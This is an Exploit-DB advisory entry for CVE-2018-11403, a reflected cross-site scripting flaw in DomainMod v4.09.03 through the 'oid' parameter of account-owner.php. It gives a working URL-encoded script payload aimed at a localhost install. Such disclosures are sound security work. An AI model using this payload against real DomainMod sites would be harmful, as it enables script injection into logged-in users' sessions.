DomainMod 4.09.03 - 'oid' Cross-Site Scripting

EDB-ID:

44782

Author:

longer

Type:

webapps

Platform:

PHP

Published:

2018-05-28

# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter
# Date: 2018-05-28
# Exploit Author: longer(76439392@qq.com)
# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03
# CVE : CVE-2018-11403
 
An issue was discovered in DomainMod v4.09.03.(https://github.com/domainmod/domainmod/issues/63)
After the user logged in, open the url :
http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E